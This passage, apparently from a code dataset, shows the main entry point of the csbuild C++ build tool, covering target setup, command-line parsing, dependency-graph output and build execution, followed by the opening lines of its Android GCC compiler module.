runtime\n\t\t\t\t\tpass\n\t\t\t\tcsbuild.AddDefines(\"NDEBUG\")\n\n\t\t\twith csbuild.Target(\"debug\"):\n\t\t\t\tlog.Info(\"Setting up target 'debug'\")\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetOptimizationLevelIfUnset(OptimizationLevel.Disabled)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support an optimization level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugLevelIfUnset(DebugLevel.EmbeddedSymbols)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugRuntimeIfUnset(True)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug runtime\n\t\t\t\t\tpass\n\t\t\t\tcsbuild.AddDefines(\"_DEBUG\")\n\n\t\t\twith csbuild.Target(\"fastdebug\"):\n\t\t\t\tlog.Info(\"Setting up target 'fastdebug'\")\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetOptimizationLevelIfUnset(OptimizationLevel.Max)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support an optimization level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugLevelIfUnset(DebugLevel.EmbeddedSymbols)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug level\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tcsbuild.SetDebugRuntimeIfUnset(False)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\t# ignore toolchains that don't support a debug runtime\n\t\t\t\t\tpass\n\t\t\t\tcsbuild.AddDefines(\"_DEBUG\")\n\t\t\t\tcsbuild.AddDefines(\"_FASTDEBUG\")\n\t\t\tlog.Info(\"{}\", csbuild.currentPlan.knownTargets)\n\t\tcsbuild.currentPlan = oldPlan\n\ndef Run():\n\t\"\"\"\n\tRun the build! This is the main entry point for csbuild.\n\t\"\"\"\n\tshared_globals.startTime = time.time()\n\n\twith perf_timer.PerfTimer(\"Argument Parsing\"):\n\t\tmainFileDir = \"\"\n\t\tmainFile = sys.modules['__main__'].__file__\n\t\tscriptFiles = []\n\t\tmakefileDict = {}\n\n\t\ttools.InitTools()\n\n\t\tif mainFile is not None:\n\t\t\tmainFileDir = os.path.abspath(os.path.dirname(mainFile))\n\t\t\tif mainFileDir:\n\t\t\t\tos.chdir(mainFileDir)\n\t\t\t\tmainFile = os.path.basename(os.path.abspath(mainFile))\n\t\t\telse:\n\t\t\t\tmainFileDir = os.path.abspath(os.getcwd())\n\t\t\tscriptFiles.append(os.path.join(mainFileDir, mainFile))\n\t\t\tif \"-h\" in sys.argv or \"--help\" in sys.argv:\n\t\t\t\tshared_globals.runMode = csbuild.RunMode.Help\n\t\t\t\t_execfile(mainFile, makefileDict, makefileDict)\n\t\t\t\t_setupDefaultTargets()\n\t\telse:\n\t\t\tlog.Error(\"csbuild cannot be run from the interactive console.\")\n\t\t\tsystem.Exit(1)\n\n\t\tepilog = \" ------------------------------------------------------------ \\n\\nProjects available in this makefile (listed in build order):\\n\\n\"\n\n\t\tprojtable = [[]]\n\t\ti = 1\n\t\tj = 0\n\n\t\tmaxcols = 4#min(math.floor(len(shared_globals.sortedProjects) / 4), 4)\n\n\t\tfor proj in shared_globals.sortedProjects:\n\t\t\tprojtable[j].append(proj.name)\n\t\t\tif i < maxcols:\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tprojtable.append([])\n\t\t\t\ti = 1\n\t\t\t\tj += 1\n\n\t\tif projtable:\n\t\t\tmaxlens = [15] * len(projtable[0])\n\t\t\tfor col in projtable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tmaxlens[subindex] = max(maxlens[subindex], len(item))\n\n\t\t\tfor col in projtable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\titem = col[subindex]\n\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += item\n\t\t\t\t\tfor _ in range(maxlens[subindex] - len(item)):\n\t\t\t\t\t\tepilog += \" 
\"\n\t\t\t\t\tepilog += \" \"\n\t\t\t\tepilog += \"\\n\"\n\n\t\tepilog += \"\\nTargets available in this makefile:\\n\\n\"\n\n\t\ttargtable = [[]]\n\t\ti = 1\n\t\tj = 0\n\n\t\tmaxcols = 4#min(math.floor(len(shared_globals.allTargets) / 4), 4)\n\n\t\tfor targ in sorted(shared_globals.allTargets):\n\t\t\tif targ == csbuild.currentPlan.defaultTarget:\n\t\t\t\ttarg += \" (default)\"\n\t\t\ttargtable[j].append(targ)\n\t\t\tif i < maxcols:\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\ttargtable.append([])\n\t\t\t\ti = 1\n\t\t\t\tj += 1\n\n\t\tif targtable:\n\t\t\tmaxlens = [15] * len(targtable[0])\n\t\t\tfor col in targtable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tmaxlens[subindex] = max(maxlens[subindex], len(item))\n\n\t\t\tfor col in targtable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += item\n\t\t\t\t\tfor _ in range(maxlens[subindex] - len(item)):\n\t\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += \" \"\n\t\t\t\tepilog += \"\\n\"\n\n\t\tepilog += \"\\nAvailable solution generators:\\n\\n\"\n\n\t\tgentable = [[]]\n\t\ti = 1\n\t\tj = 0\n\n\t\tmaxcols = 4#min(math.floor(len(shared_globals.allGenerators) / 4), 4)\n\n\t\tfor gen in sorted(shared_globals.allGenerators.keys()):\n\t\t\tgentable[j].append(gen)\n\t\t\tif i < maxcols:\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tgentable.append([])\n\t\t\t\ti = 1\n\t\t\t\tj += 1\n\n\t\tif gentable:\n\t\t\tmaxlens = [15] * len(gentable[0])\n\t\t\tfor col in gentable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tmaxlens[subindex] = max(maxlens[subindex], len(item))\n\n\t\t\tfor col in gentable:\n\t\t\t\tfor subindex, item in enumerate(col):\n\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += item\n\t\t\t\t\tfor _ in range(maxlens[subindex] - len(item)):\n\t\t\t\t\t\tepilog += \" \"\n\t\t\t\t\tepilog += \" \"\n\t\t\t\tepilog += \"\\n\"\n\n\t\tparser = shared_globals.parser = argparse.ArgumentParser(\n\t\t\tprog = mainFile, epilog = epilog, formatter_class = argparse.RawDescriptionHelpFormatter)\n\n\t\tparser.add_argument('--version', action = \"store_true\", help = \"Print version information and exit\")\n\n\t\tgroup = parser.add_mutually_exclusive_group()\n\t\tgroup.add_argument('-t', '--target', action='append', help = 'Target(s) for build. (May be specified multiple times.)', default=[])\n\t\tgroup.add_argument('--at', \"--all-targets\", action = \"store_true\", help = \"Build all targets\")\n\n\t\tparser.add_argument(\"-p\", \"--project\",\n\t\t\t\t\t\t\taction=\"append\", help = \"Build only the specified project. (May be specified multiple times.)\",)\n\n\t\tgroup = parser.add_mutually_exclusive_group()\n\t\tgroup.add_argument('-o', '--toolchain', help = \"Toolchain(s) to use for compiling. (May be specified multiple times.)\",\n\t\t\tdefault=[], action = \"append\")\n\t\tgroup.add_argument(\"--ao\", '--all-toolchains', help=\"Build with all toolchains\", action = \"store_true\")\n\n\t\tgroup = parser.add_mutually_exclusive_group()\n\t\tgroup.add_argument(\"-a\", \"--architecture\", \"--arch\", help = 'Architecture(s) to compile for each toolchain. 
(May be specified multiple times.)', action = \"append\",)\n\t\tgroup.add_argument(\"--aa\", \"--all-architectures\", \"--all-arch\", action = \"store_true\", help = \"Build all architectures supported by this toolchain\")\n\n\t\tgroup = parser.add_mutually_exclusive_group()\n\t\tgroup.add_argument('-c', '--clean', action = \"store_true\", help = 'Clean the target build')\n\t\t#group.add_argument('--install', action = \"store_true\", help = 'Install the target build')\n\t\t#group.add_argument('--install-headers', action = \"store_true\", help = 'Install only headers for the target build')\n\t\t#group.add_argument('--install-output', action = \"store_true\", help = 'Install only the output for the target build')\n\t\tgroup.add_argument('-r', '--rebuild', action = \"store_true\", help = 'Clean the target build and then build it')\n\n\t\tgroup2 = parser.add_mutually_exclusive_group()\n\t\tgroup2.add_argument('-v', '--verbose', action = \"store_const\", const = 0, dest = \"verbosity\",\n\t\t\thelp = \"Verbose. Enables additional INFO-level logging.\", default = 1)\n\t\tgroup2.add_argument('-q', '--quiet', action = \"store_const\", const = 2, dest = \"verbosity\",\n\t\t\thelp = \"Quiet. Disables all logging except for WARN and ERROR.\", default = 1)\n\t\tgroup2.add_argument('-qq', '--very-quiet', action = \"store_const\", const = 3, dest = \"verbosity\",\n\t\t\thelp = \"Very quiet. Disables all csb-specific logging.\", default = 1)\n\n\t\tparser.add_argument(\"-j\", \"--jobs\", action = \"store\", dest = \"jobs\", type = int, help = \"Number of simultaneous build processes\")\n\n\t\t#parser.add_argument(\"-g\", \"--gui\", action = \"store_true\", dest = \"gui\", help = \"Show GUI while building (experimental)\")\n\t\t#parser.add_argument(\"--auto-close-gui\", action = \"store_true\", help = \"Automatically close the gui on build success (will stay open on failure)\")\n\t\t#parser.add_argument(\"--profile\", action=\"store_true\", help=\"Collect detailed line-by-line profiling information on compile time. 
--gui option required to see this information.\")\n\n\t\tparser.add_argument('--show-commands', help = \"Show all commands sent to the system.\", action = \"store_true\")\n\t\tparser.add_argument('--force-color', help = \"Force color on or off.\",\n\t\t\taction = \"store\", choices = [\"on\", \"off\"], default = None, const = \"on\", nargs = \"?\")\n\t\tparser.add_argument('--force-progress-bar', help = \"Force progress bar on or off.\",\n\t\t\taction = \"store\", choices = [\"on\", \"off\"], default = None, const = \"on\", nargs = \"?\")\n\n\t\t#parser.add_argument('--prefix', help = \"install prefix (default /usr/local)\", action = \"store\")\n\t\t#parser.add_argument('--libdir', help = \"install location for libraries (default {prefix}/lib)\", action = \"store\")\n\t\t#parser.add_argument('--incdir', help = \"install prefix (default {prefix}/include)\", action = \"store\")\n\n\t\tparser.add_argument(\"--stop-on-error\", help = \"Stop compilation after the first error is encountered.\", action = \"store_true\")\n\t\t#parser.add_argument('--no-precompile', help = \"Disable precompiling globally, affects all projects\",\n\t\t#\taction = \"store_true\")\n\t\t#parser.add_argument('--no-chunks', help = \"Disable chunking globally, affects all projects\",\n\t\t#\taction = \"store_true\")\n\n\t\tparser.add_argument('--dg', '--dependency-graph', help=\"Generate dependency graph\", action=\"store_true\")\n\t\tparser.add_argument('--dg-stubs', '--dependency-graph-stubs', help=\"Generate dependency graph with stubs\", action=\"store_true\")\n\t\tparser.add_argument('--dg-type', '--dependency-graph-type', help=\"Graphviz engine to use for DG\", action=\"store\", default=\"dot\", choices=[\"dot\", \"neato\", \"twopi\", \"circo\", \"fdp\", \"sfdp\"])\n\n\t\tparser.add_argument('--clear-cache', help=\"Removes cached data such as header dependency caches and artifact metadata (note: will trigger a rebuild)\", action=\"store_true\")\n\n\t\tparser.add_argument(\"--perf-report\", help=\"Collect and show perf report at the end of execution\",\n\t\t\t\t\t\t\taction = \"store\", choices = [\"tree\", \"flat\", \"html\"], default = None, const = \"tree\", nargs = \"?\")\n\n\t\t#parser.add_argument(\"-d\", \"--define\", help = \"Add defines to each project being built.\", action = \"append\")\n\n\t\tgroup = parser.add_argument_group(\"Solution generation\", \"Commands to generate a solution\")\n\t\tgroup.add_argument('--generate-solution', help = \"Generate a solution file for use with the given IDE.\",\n\t\t\taction = \"store\")\n\t\tgroup.add_argument('--solution-path',\n\t\t\thelp = \"Path to output the solution file (default is ./Solutions/<solutiontype>)\", action = \"store\",\n\t\t\tdefault = \"\")\n\t\tgroup.add_argument('--solution-name', help = \"Name of solution output file (default is csbuild)\", action = \"store\",\n\t\t\tdefault = \"csbuild\")\n\t\tgroup.add_argument('--solution-args', help = 'Arguments passed to the build script executed by the solution',\n\t\t\taction = \"store\", default = \"\")\n\n\t\t#TODO: Additional args here\n\t\t# for chain in _shared_globals.alltoolchains.items():\n\t\t# \tchainInst = chain[1]()\n\t\t# \targfuncs = set()\n\t\t# \tfor tool in chainInst.tools.values():\n\t\t# \t\tif(\n\t\t# \t\t\thasattr(tool.__class__, \"AdditionalArgs\")\n\t\t# \t\t\tand tool.__class__.AdditionalArgs != toolchain.compilerBase.AdditionalArgs\n\t\t# \t\t\tand tool.__class__.AdditionalArgs != toolchain.linkerBase.AdditionalArgs\n\t\t# \t\t):\n\t\t# 
\t\t\targfuncs.add(tool.__class__.AdditionalArgs)\n\t\t#\n\t\t# \tif argfuncs:\n\t\t# \t\tgroup = parser.add_argument_group(\"Options for toolchain {}\".format(chain[0]))\n\t\t# \t\tfor func in argfuncs:\n\t\t# \t\t\tfunc(group)\n\t\t#\n\t\t# for gen in _shared_globals.allgenerators.items():\n\t\t# \tif gen[1].AdditionalArgs != project_generator.project_generator.AdditionalArgs:\n\t\t# \t\tgroup = parser.add_argument_group(\"Options for solution generator {}\".format(gen[0]))\n\t\t# \t\tgen[1].AdditionalArgs(group)\n\t\t#\n\t\t# if _options:\n\t\t# \tgroup = parser.add_argument_group(\"Local makefile options\")\n\t\t# \tfor option in _options:\n\t\t# \t\tgroup.add_argument(*option[0], **option[1])\n\n\t\t#args, remainder = parser.parse_known_args()\n\t\t#args.remainder = remainder\n\t\t#TODO: temporary, set runPerfReport to false so unknown flags don't trigger perf report to get printed\n\t\t#Once custom options are implemented this will not be needed and will go away.\n\t\tperf_timer.EnablePerfTracking(False)\n\t\targs = parser.parse_args()\n\n\t\tif args.version:\n\t\t\tshared_globals.runMode = csbuild.RunMode.Version\n\n\t\t\tprint(\"CSBuild version {}\".format(csbuild.__version__))\n\t\t\tprint(csbuild.__copyright__)\n\t\t\tprint(\"Code by {}\".format(csbuild.__author__))\n\t\t\tprint(\"Additional credits: {}\\n\".format(\", \".join(csbuild.__credits__)))\n\t\t\tprint(\"Maintainer: {} - {}\".format(csbuild.__maintainer__, csbuild.__email__))\n\t\t\treturn\n\n\t\tcsbDir = os.path.join(mainFileDir, \".csbuild\")\n\t\tshared_globals.settings = settings_manager.SettingsManager(os.path.join(csbDir, \"settings\"))\n\n\t\tif args.clear_cache:\n\t\t\tshared_globals.settings.Clear()\n\t\t\targs.rebuild = True\n\n\t\tshared_globals.verbosity = args.verbosity\n\t\tshared_globals.showCommands = args.show_commands\n\t\tif args.perf_report is not None:\n\t\t\tperf_timer.EnablePerfTracking(True)\n\t\t\tif args.perf_report == \"tree\":\n\t\t\t\tshared_globals.runPerfReport = perf_timer.ReportMode.TREE\n\t\t\telif args.perf_report == \"flat\":\n\t\t\t\tshared_globals.runPerfReport = perf_timer.ReportMode.FLAT\n\t\t\telse:\n\t\t\t\tshared_globals.runPerfReport = perf_timer.ReportMode.HTML\n\n\t\tif args.force_color == \"on\":\n\t\t\tshared_globals.colorSupported = True\n\t\telif args.force_color == \"off\":\n\t\t\tshared_globals.colorSupported = False\n\t\telse:\n\t\t\tshared_globals.colorSupported = terminfo.TermInfo.SupportsColor()\n\n\t\tif args.dg:\n\t\t\tshared_globals.runMode = csbuild.RunMode.GenerateDependencyGraph\n\n\t\tif args.generate_solution:\n\n\t\t\tshared_globals.runMode = csbuild.RunMode.GenerateSolution\n\t\t\tshared_globals.solutionGeneratorType = args.generate_solution\n\n\t\t\tif args.solution_path:\n\t\t\t\tshared_globals.solutionPath = args.solution_path\n\t\t\telse:\n\t\t\t\tshared_globals.solutionPath = \"./Solutions/{}/\".format(args.generate_solution)\n\n\t\t\tshared_globals.solutionPath = os.path.abspath(shared_globals.solutionPath)\n\n\t\t\tif not os.access(shared_globals.solutionPath, os.F_OK):\n\t\t\t\tos.makedirs(shared_globals.solutionPath)\n\n\t\t\tif args.solution_args:\n\t\t\t\tshared_globals.solutionArgs = args.solution_args\n\n\t\t\tif args.solution_name:\n\t\t\t\tsolutionName = args.solution_name\n\t\t\telse:\n\t\t\t\tsolutionName = \"csbuild\"\n\n\t\t\[email protected]\n\t\t\tdef OnBuildFinished(projectList): # pylint: disable=unused-variable\n\t\t\t\t\"\"\"\n\t\t\t\t:param projectList: list of projects\n\t\t\t\t:type projectList: 
list[project.Project]\n\t\t\t\t\"\"\"\n\t\t\t\tsolutionTool = shared_globals.allGenerators[args.generate_solution].solutionTool\n\t\t\t\tif not os.access(shared_globals.solutionPath, os.F_OK):\n\t\t\t\t\tos.makedirs(shared_globals.solutionPath)\n\t\t\t\tsolutionTool.GenerateSolution(shared_globals.solutionPath, solutionName, projectList)\n\n\t\t\tfor tool in shared_globals.allGeneratorTools:\n\t\t\t\tcsbuild.Toolchain(*shared_globals.allToolchains).AddTool(tool)\n\n\t\t_execfile(mainFile, makefileDict, makefileDict)\n\t\t_setupDefaultTargets()\n\n\t\tif args.generate_solution:\n\t\t\tif args.generate_solution not in shared_globals.allGenerators:\n\t\t\t\tlog.Error(\"No such solution generator: {}\", args.generate_solution)\n\t\t\t\tsystem.Exit(1)\n\n\t\tif args.at:\n\t\t\ttargetList = list(shared_globals.allTargets)\n\t\telif args.target:\n\t\t\ttargetList = args.target\n\t\telse:\n\t\t\ttargetList = [project_plan.useDefault]\n\n\t\tif hasattr(args, \"aa\") and args.aa:\n\t\t\tarchList = list(shared_globals.allArchitectures)\n\t\telif hasattr(args, \"architecture\") and args.architecture:\n\t\t\tarchList = args.architecture\n\t\telse:\n\t\t\tarchList = [project_plan.useDefault]\n\n\t\tif args.ao:\n\t\t\ttoolchainList = list(shared_globals.allToolchains)\n\t\telif args.toolchain:\n\t\t\ttoolchainList = args.toolchain\n\t\telse:\n\t\t\ttoolchainList = [project_plan.useDefault]\n\n\t\tif not args.jobs:\n\t\t\targs.jobs = multiprocessing.cpu_count()\n\n\t\tif args.force_progress_bar == \"on\":\n\t\t\tshared_globals.columns = 80\n\t\telif args.force_progress_bar == \"off\":\n\t\t\tshared_globals.columns = 0\n\t\telse:\n\t\t\tshared_globals.columns = terminfo.TermInfo.GetNumColumns( )\n\t\tshared_globals.clearBar = \"\\r\" + \" \" * shared_globals.columns + \"\\r\"\n\n\tprojectBuildList = []\n\n\tpreparationStart = time.time()\n\tshared_globals.startTime = preparationStart\n\n\tif args.project:\n\t\tprojectFilter = set(args.project)\n\t\tadded = set()\n\t\tfilteredProjects = dag.DAG(lambda x: x.name)\n\t\tfor plan in reversed(list(shared_globals.sortedProjects)):\n\t\t\tif plan.name in projectFilter:\n\t\t\t\tif plan.name not in added:\n\t\t\t\t\tadded.add(plan.name)\n\t\t\t\t\tprojectFilter.update(plan.depends)\n\t\t\t\t\tfilteredProjects.Add(plan, plan.depends)\n\t\tshared_globals.sortedProjects = filteredProjects\n\t\tnonexistent = projectFilter - added\n\t\tif nonexistent:\n\t\t\tlog.Error(\"No such project(s): {}\", \", \".join(nonexistent))\n\t\t\tsystem.Exit(1)\n\n\t# Note:\n\t# The reason for this bit of code is that the import lock, in the way that CSBuild operates, prevents\n\t# us from being able to call subprocess.Popen() or any other process execution function other than os.popen().\n\t# csbuild is replacing the global import lock with its own lock to achieve the same functionality without the hang.\n\t# We then release the global import lock, but no one using csbuild should ever have to care about that, ever.\n\n\tclass _importLocker(object):\n\t\t\"\"\"\n\t\tThis replaces the global import lock with a new lock to get around a hang in subprocess.Popen() when the lock's held\n\t\t\"\"\"\n\t\tdef __init__(self):\n\t\t\tself.lock = threading.RLock()\n\t\t\tself.loader = None\n\n\t\t#pylint: disable=invalid-name\n\t\tdef find_module(self, fullname, path=None):\n\t\t\t\"\"\"\n\t\t\tFind the module loader, always returns self so the load_module will be called and the lock released\n\t\t\t:param fullname: name of module\n\t\t\t:type fullname: str\n\t\t\t:param path: path to look 
in\n\t\t\t:type path: str\n\t\t\t:return: self\n\t\t\t:rtype: _importLocker\n\t\t\t\"\"\"\n\t\t\tself.lock.acquire()\n\t\t\tsys.meta_path.pop(0)\n\t\t\tself.loader = imp.find_module(fullname.rpartition(\".\")[2], path)\n\t\t\tsys.meta_path.insert(0, self)\n\t\t\tif self.loader is not None:\n\t\t\t\treturn self\n\t\t\tself.lock.release()\n\t\t\treturn None\n\n\t\tdef load_module(self, name):\n\t\t\t\"\"\"\n\t\t\tLoad the module from whatever loader we actually found to load it, then release the lock\n\t\t\t:param name: name of module\n\t\t\t:type name: str\n\t\t\t:return: the loaded module\n\t\t\t:rtype: module\n\t\t\t\"\"\"\n\t\t\ttry:\n\t\t\t\treturn imp.load_module(name, *self.loader)\n\t\t\tfinally:\n\t\t\t\tself.lock.release()\n\n\tsys.meta_path.insert(0, _importLocker())\n\n\tfailures = 0\n\n\tif imp.lock_held():\n\t\timp.release_lock()\n\tlog.StartLogThread()\n\n\twith perf_timer.PerfTimer(\"Project plan execution\"):\n\t\tlog.Build(\"Preparing build...\")\n\t\tfor toolchainName in toolchainList:\n\t\t\tlog.Info(\"Collecting projects for toolchain {}\", toolchainName)\n\t\t\tfor archName in archList:\n\t\t\t\tlog.Info(\"-- Architecture {}\", archName)\n\t\t\t\tfor targetName in targetList:\n\t\t\t\t\tlog.Info(\"---- Target {}\", targetName)\n\t\t\t\t\tfor plan in shared_globals.sortedProjects:\n\t\t\t\t\t\tlog.Info(\"------ Project {}\", plan.name)\n\t\t\t\t\t\tproj = plan.ExecutePlan(toolchainName, archName, targetName)\n\t\t\t\t\t\tif proj is None:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tshared_globals.projectMap.setdefault(proj.toolchainName, {}) \\\n\t\t\t\t\t\t\t.setdefault(proj.architectureName, {}) \\\n\t\t\t\t\t\t\t.setdefault(proj.targetName, {})[plan.name] = proj\n\t\t\t\t\t\tif proj.projectType != csbuild.ProjectType.Stub or csbuild.GetRunMode() == csbuild.RunMode.GenerateSolution or args.dg:\n\t\t\t\t\t\t\tprojectBuildList.append(proj)\n\n\tif not projectBuildList:\n\t\tlog.Error(\"No projects were found supporting the requested architecture, toolchain, target, and platform combination\")\n\t\tsystem.Exit(1)\n\n\n\twith perf_timer.PerfTimer(\"Dependency resolution\"):\n\t\tfor proj in projectBuildList:\n\t\t\tproj.ResolveDependencies()\n\n\tif args.dg:\n\t\tbuilder = 'digraph G {{\\n\\tlayout=\"{}\";\\n\\toverlap=\"false\";\\n\\tsplines=\"spline\";\\n\\tratio=0.7;\\n\\trankdir=\"LR\"\\n'.format(args.dg_type)\n\t\tcolors = [\n\t\t\t\"#ff0000\", \"#cc5200\", \"#b2742d\", \"#858c23\", \"#20802d\",\n\t\t\t\"#00ffcc\", \"#39c3e6\", \"#205380\", \"#003380\", \"#38008c\",\n\t\t\t\"#ff40d9\", \"#e53967\", \"#f20000\", \"#7f4620\", \"#cca300\",\n\t\t\t\"#66ff00\", \"#00cc6d\", \"#36d9ce\", \"#007a99\", \"#0061f2\",\n\t\t\t\"#0000f2\", \"#cc00ff\", \"#d9368d\", \"#7f202d\", \"#991400\",\n\t\t\t\"#f28100\", \"#dae639\", \"#69bf30\", \"#269973\", \"#208079\",\n\t\t\t\"#00a2f2\", \"#397ee6\", \"#0000e6\", \"#8d29a6\", \"#990052\"\n\t\t]\n\t\tidx = 0\n\t\tprojectsInGraph = []\n\t\tfor buildProj in projectBuildList:\n\t\t\tlog.Info(buildProj.name)\n\t\t\tcolor = colors[idx]\n\t\t\tidx += 1\n\t\t\tif idx == len(colors):\n\t\t\t\tidx = 0\n\n\t\t\tif buildProj.projectType == csbuild.ProjectType.Application:\n\t\t\t\tshape = \"doublecircle\"\n\t\t\telif buildProj.projectType == csbuild.ProjectType.Stub:\n\t\t\t\tif not args.dg_stubs:\n\t\t\t\t\tcontinue\n\t\t\t\tgood = False\n\t\t\t\tfor proj in projectBuildList:\n\t\t\t\t\tif buildProj in proj.dependencies:\n\t\t\t\t\t\tgood = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif not good:\n\t\t\t\t\tcontinue\n\n\t\t\t\tshape = \"oval\"\n\t\t\t\tcolor = 
\"#000000\"\n\t\t\telse:\n\t\t\t\tshape = \"component\"\n\n\t\t\tprojectsInGraph.append(buildProj)\n\n\t\t\tbuilder += '\\t{0} [shape=\"{1}\" color=\"{2}\" style=\"filled\" fillcolor=\"{2}30\"];\\n'.format(buildProj.name.replace(\"-\", \"_\"), shape, color)\n\t\t\tclass _shared:\n\t\t\t\ttopLevelDependencies = set(buildProj.dependencies)\n\t\t\tdef _recurseAndRemove(deps):\n\t\t\t\tfor dep in deps:\n\t\t\t\t\tfor nextDep in dep.dependencies:\n\t\t\t\t\t\tif nextDep in _shared.topLevelDependencies:\n\t\t\t\t\t\t\t_shared.topLevelDependencies.remove(nextDep)\n\t\t\t\t\t_recurseAndRemove(dep.dependencies)\n\t\t\t_recurseAndRemove(buildProj.dependencies)\n\n\t\t\tdist = 0\n\t\t\tfor otherProj in _shared.topLevelDependencies:\n\t\t\t\tif otherProj.projectType == csbuild.ProjectType.Stub and not args.dg_stubs:\n\t\t\t\t\tcontinue\n\t\t\t\tbuilder += '\\t{} -> {} [color=\"{}\";];\\n'.format(buildProj.name.replace(\"-\", \"_\"), otherProj.name.replace(\"-\", \"_\"), color)\n\t\t\t\tdist += 1\n\n\t\tapplications = [proj for proj in projectsInGraph if proj.projectType == csbuild.ProjectType.Application]\n\t\tbuilder += \"\\t{{ rank=same; {} }}\\n\".format(\"; \".join([proj.name.replace(\"-\", \"_\") for proj in applications]))\n\n\t\tbuilder += \"}\"\n\t\twith open(\"depends.gv\", \"w\") as f:\n\t\t\tf.write(builder)\n\t\tlog.Build(\"Wrote depends.gv\")\n\t\ttry:\n\t\t\t# pylint: disable=import-error\n\t\t\tfrom graphviz import Digraph\n\t\texcept ImportError:\n\t\t\tlog.Warn(\"graphviz library not found. You can open depends.gv with graphviz or a similar dot viewer to view the graph, or install graphviz with pip install graphviz.\")\n\t\telse:\n\t\t\tgraph = Digraph(comment=\"CSBuild Dependency Graph\", format=\"png\", engine=args.dg_type, filename=\"depends\")\n\t\t\tDigraph.source=property(lambda self: builder)\n\t\t\tgraph.render(\"depends.gv\", view=True)\n\t\t\tlog.Build(\"Wrote depends.png\")\n\t\treturn\n\n\tif not args.clean or args.rebuild:\n\t\twith perf_timer.PerfTimer(\"Project setup\"):\n\t\t\t#Now all dependencies have been resolved, so let toolchains do their post-resolution setup\n\t\t\tfor proj in projectBuildList:\n\t\t\t\tfor tool in proj.toolchain.GetAllTools():\n\t\t\t\t\tproj.toolchain.Tool(tool).SetupForProject(proj)\n\n\tshared_globals.projectBuildList = projectBuildList\n\n\ttotaltime = time.time() - preparationStart\n\tlog.Build(\"Build preparation took {}\".format(FormatTime(totaltime)))\n\n\tif args.clean or args.rebuild:\n\t\t_clean(projectBuildList, args.rebuild)\n\n\tif not args.clean or args.rebuild:\n\t\tshared_globals.commandOutputThread = threading.Thread(target=commands.PrintStaggeredRealTimeOutput)\n\t\tshared_globals.commandOutputThread.start()\n\n\t\tlog.Build(\"Executing build start hooks\")\n\t\tfor hook in shared_globals.buildStartedHooks:\n\t\t\thook(projectBuildList)\n\n\t\tfailures = _build(args.jobs, projectBuildList)\n\n\t\tlog.Build(\"Executing build completion hooks\")\n\t\tfor hook in shared_globals.buildFinishedHooks:\n\t\t\thook(projectBuildList)\n\n\twith perf_timer.PerfTimer(\"Waiting on logging to shut down\"):\n\t\tlog.StopLogThread()\n\n\tshared_globals.settings.Persist()\n\n\ttotaltime = time.time() - preparationStart\n\tlog.Build(\"Total execution took {}\".format(FormatTime(totaltime)))\n\tsystem.Exit(failures)\n" }, { "alpha_fraction": 0.7086859941482544, "alphanum_fraction": 0.7102450132369995, "avg_line_length": 36.10743713378906, "blob_id": "e372877a3b60cdebb582a3d712e6b8a8086eb75c", "content_id": "7aaec9ff43a73a642294ee959c13ddc09a52d501", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4490, "license_type": "no_license", "max_line_length": 146, "num_lines": 121, "path": "/csbuild/tools/cpp_compilers/android_gcc_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: android_gcc_cpp_compiler\n\t:synopsis: Android GCC compiler tool for C++.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nimport csbuild\n\nfrom .gcc_cpp_compiler import GccCppCompiler\nfrom ..common.android_tool_base import AndroidToolBase\nfrom ..._build.input_file import InputFile\n\nclass 